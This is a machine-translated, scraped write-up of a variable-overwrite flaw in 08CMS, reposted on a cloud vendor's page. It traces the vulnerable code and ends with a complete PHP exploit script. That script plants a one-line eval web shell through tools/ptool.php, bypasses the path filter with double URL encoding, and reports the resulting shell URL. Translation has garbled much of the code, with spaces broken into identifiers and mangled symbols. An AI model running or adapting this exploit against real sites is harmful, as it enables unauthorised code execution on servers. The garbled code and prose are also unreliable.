Getshell and other problems caused by 08CMS variable Overwrite

Source: Internet
Author: User

I am also a beginner. What is wrong with php? I hope you can tell me the mistake... ========================================================== ============================================/Include/general. inc. php lines 21-26

(isset($_REQUEST['GLOBALS']) || isset($_FILES['GLOBALS'])) && exit('08cms Error');if(!QUOTES_GPC && $_FILES) $_FILES = maddslashes($_FILES);foreach(array('_GET','_POST') as $_request){foreach($$_request as $k => $v){$k{0} != '_' && $$k = maddslashes($v);}}
This is easy to write, but we can submit it when the variable is not initialized. Let's take a look at the Index. php file.
Include_once dirname (_ FILE __). '/include/general. inc. php'; include_once M_ROOT. '. /include/common. fun. php '; if_siteclosed (); mobile_open () | message ('mobile phone version not open'); parse_str (un_virtual ($ _ SERVER ['query _ string']), $ temparr);/* let's look at the code $ _ SERVER ['query _ string'] to obtain the query string .. For example, xx. php? Id = 222 then he gets id = 222un_virtual. This function is used to filter and obtain the query string. Let's take a look at the function un_virtual ($ str ){...... $ str = str_replace (array ('/', '-'), array ('&', '='), $ str ); replace/and-with & and = ...... return $ str;} parse_str () parses the query string to the variable to store the variable $ temparr. Let's take a look at the following: $ _ da = array (); if (! $ Cnstr) {$ tplname =$ _ ismobile? $ O_index_tpl: $ hometpl; // $ tplname defined here $ _ da ['rss '] = $ cms_abs. 'rss. php '; $ _ da + = $ temparr; // $ _ da = $ _ da + $ temparr unset ($ temparr); // destroy the variable extract ($ _ da, EXTR_OVERWRITE); // The variable overwrite so that we can control the variable $ tplname tpl_refresh ($ tplname); // This tpl_refresh function is the place where we want to use it to see what we wrote */
\ Include \ refresh. fun. php Line 2
Function tpl_refresh ($ tplname) {global $ templatedir, $ debugtag; $ tdir = M_ROOT. "template/$ templatedir/"; $ cacf = $ tdir. 'pcache /'. $ tplname. '. php '; // if (file_exists ($ x = $ tdir. "function/utags. fun. php ") include_once $ x; // here, of course, you can also use the truncation mmkdir ($ cacf, 0, 1); if ($ debugtag |! File_exists ($ cacf) {// easy process $ str = load_tpl ($ tplname); // check whether the function name is the content returned when the file is opened/* load_tp: include \ refresh. fun. php row 1137 $ tpl = @ file2str (M_ROOT. "template/$ templatedir /". $ tplname); // file2str this is the function for opening the file. I will not paste $ rt & $ tpl = preg_replace ("/\ {tpl \ $ (. + ?) \}/Ies "," rtagval ('\ 1',' $ rt ') ", $ tpl ); filter without pressure */$ str = preg_replace ("/<\\? (?! Php \ s | = | \ s)/I ", '<? = \ '<? \ '?> ', $ Str); // still no pressure $ str = preg_replace ("/\ <\! \-\ {(. + ?) \}\-\>/S "," {\\ 1} ", $ str); breplace ($ str,''); nreplace ($ str ); quit_refresh_var (); $ str = tpl_basecode ($ str); // the above Code filters str2file ($ str, $ cacf ); // This is the file write function and will not be pasted} unset ($ str, $ tdir, $ cacf );}
With this, we can write files, but there are still some restrictions.
$cacf = $tdir.'pcache/'.$tplname.'.php';  $str = load_tpl($tplname);$tpl = @file2str(M_ROOT."template/$templatedir/".$tplname);
$ Tplname is controlled by us. We can upload an image to generate a file. We can also find other places where wood is generated \ tools \ ptool. php.
$ Cf = M_ROOT. '. /dynamic/stats/aclicks. cac '; $ ct = M_ROOT. '. /dynamic/stats/aclicks_time.cac ';/* omitted */if (@ $ fp = fopen ($ cf, 'A') {fwrite ($ fp, "$ aid \ n"); fclose ($ fp); aid is not initialized. We can submit
8 aid is not initialized. We can submit it. Now we can submit the Write File, but there is still a restriction that it cannot jump out of the Directory because the filter at the beginning (the code at the beginning) parse_str (un_virtual ($ _ SERVER ['query _ string']), $ temparr ); however, because the parse_str function will automatically decode the url, we can add a url encoding to bypass the un_virtual filter ~ This cms still has many problems .. It may be a mistake to write an exp for new users:
<? Php/* car CMS4.1 GBK: exp index. php? Tplname = .. % 252f .. % 252 fdynamic % 252 fstats % 252faclicks. cacshell/dynamic/tplcache/common /.... dynamicstatsaclicks. cac. php decoration CMS: shell:/dynamic/stats/aclicks. cac. php */$ exp = '/tools/ptool. php? Aid = % 3C % 3 Fphp % 20 eval % 28% 24_POST % 5Ba % 5D % 29% 3B % 3F % 3E '; $ exp1 ='/index. php? Tplname = .. % 2f .. % 2 fdynamic % 2 fstats % 2faclicks. cac '; if ($ argc <2) {print_r (' + --------------------------------------------------------------------------- +) _ | _/| _ ______/□□\_ blank-// \ 20 \ _________ \_/>_//>_\________________ | [+] php '. $ argv [0]. '[url] www.08sec.com [/url] + ----------------------------------------------------------------------- +'); exit;} error_reporting (E_ERROR); set _ Time_limit (0); $ host = $ argv [1]; go ($ host); function go ($ host) {global $ exp, $ exp1; $ re = Send ($ host, $ exp); stripos ($ re, "MySQL")> 0? Send ($ host, $ exp): ""; $ re = Send ($ host, $ exp1) and stripos ($ re, "aclicks. cac")> 0? Exit ("+ Exploit Success! \ R \ n + http: // $ host/template/dynamic/stats/aclicks. cac. php \ r \ n "): exit ("-Exploit Failed! \ N ");} function Send ($ host, $ url) {$ data =" GET $ url HTTP/1.1 \ r \ n "; $ data. = "Host: $ host \ r \ n"; $ data. = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.03 [en] \ r \ n"; $ data. = "Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8 \ r \ n"; $ data. = "Content-Type: application/x-www-form-urlencoded \ r \ n"; $ data. = "Accept-Language: en-us \ r \ n"; $ data. = "Connection: C Lose \ r \ n "; $ fp = @ fsockopen ($ host, 80); if (! $ Fp) {die ("[-] Connect to host Error \ r \ n");} fwrite ($ fp, $ data); $ back = ''; while (! Feof ($ fp) {$ back. = fread ($ fp, 1024) ;}fclose ($ fp); return $ back ;}?>
Some versions need to be converted to 2 because some of them have decoded the car CMS4.1 GBK version: exp index. php? Tplname =... % 252f .. % 252 fdynamic % 252 fstats % 252faclicks. cacshell/dynamic/tplcache/common /.... Dynamicstatsaclicks. cac. php decoration CMS: shell:/dynamic/stats/aclicks. cac. php attaches an HTML uploaded code
[mw_shl_code=html,true]

 

(Because 08cms version many article versions are of the automotive 4.3 UTF-8 version) ====================================================== sorry... Finally, I refused to reach out to the party!

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.